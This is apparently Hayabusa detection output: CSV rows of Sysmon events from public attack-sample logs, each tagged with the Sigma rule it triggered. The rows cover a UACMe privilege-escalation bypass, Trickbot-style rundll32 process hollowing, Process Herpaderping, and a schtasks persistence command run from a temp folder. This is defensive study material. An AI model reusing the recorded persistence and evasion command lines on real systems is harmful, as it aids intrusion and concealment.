+09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Program Files\Internet 
Explorer\IEInstal.exe"" -Embedding | LID: 0x17eca2 | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.517 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.531 +09:00,DESKTOP-NTSSLJD,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1073,technique_name=DLL Side-Loading | Image: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Company: Integrity Investment LLC | Signed: false | Signature: Unavailable | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: 
SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.003,technique_name=Windows Command Shell | Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | LID: 0x17eca2 | PID: 9620 | PGUID: 23F38D93-CF20-5F8E-D008-000000000C00 | Hash: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,10,high,,Process Access_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Src Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6896 | Src PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Tgt PID: 9620 | Tgt PGUID: 23F38D93-CF20-5F8E-D008-000000000C00",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.590 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.731 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 7716 | PGUID: 23F38D93-CF20-5F8E-CF08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.999 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:57.031 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:51:01.476 +09:00,DESKTOP-NTSSLJD,22,info,,DNS Query,Query: wpad | Result: - | Process: C:\Windows\System32\svchost.exe | PID: 2428 | PGUID: 23F38D93-ABAC-5F8E-3900-000000000C00,rules/hayabusa/sysmon/events/22_DNS-Query.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\wermgr.exe | Process: C:\Windows\System32\wermgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe c:\temp\winfire.dll,DllRegisterServer | LID: 0x910e0 | PID: 5600 | PGUID: 
747F3D96-659E-5F8F-0000-001064E03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Exec,Trickbot Malware Activity,,rules/sigma/process_creation/proc_creation_win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\system32\wermgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2372 | Src PGUID: 747F3D96-659B-5F8F-0000-001026C33300 | Tgt PID: 5600 | Tgt PGUID: 747F3D96-659E-5F8F-0000-001064E03300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? 
| LID: 0x3e4 | PID: 6748 | PGUID: 747F3D96-662E-5F8F-0000-001023353800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe | URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? 
| LID: 0x3e4 | PID: 8796 | PGUID: 747F3D96-51C9-5F93-0000-001010175B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:34.745 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:34.767 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Users\Public\test.tmp | LID: 0x8a585 | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.332 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN 
DataUsageHandlers | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | LID: 0x8a585 | PID: 5572 | PGUID: 747F3D96-51D0-5F93-0000-0010B2B35B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | LID: 0x8a585 | PID: 8572 | PGUID: 747F3D96-51D0-5F93-0000-001079C05B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task 
Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:07.601 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 3420 | Src PGUID: 747F3D96-4790-5F93-0000-001054282200 | Tgt PID: 5864 | Tgt PGUID: 747F3D96-4694-5F93-0000-001092F70900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8a619 | PID: 7552 | PGUID: 747F3D96-51F9-5F93-0000-001003125E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 9116 | PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 
06:58:17.543 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\Rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7552 | Src PGUID: 747F3D96-51F9-5F93-0000-001003125E00 | Tgt PID: 9116 | Tgt PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 7504 | PGUID: 747F3D96-51FD-5F93-0000-00103B425E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:21.696 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 9116 | Src PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00 | Tgt PID: 7504 | Tgt PGUID: 747F3D96-51FD-5F93-0000-00103B425E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd | Process: 
C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | LID: 0x8a619 | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.364 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\data.enc | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.391 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\config.xml | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-27 19:17:18.369 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\samir.exe | Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | PID: 21756 | PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.377 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | Tgt Process: samir.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 21756 | Src PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418 | Tgt PID: 21048 | Tgt PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: "".\samir.exe"" | Process: C:\Users\bouss\Downloads\samir.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe | LID: 0x1478dc6e | PID: 21048 | PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: 
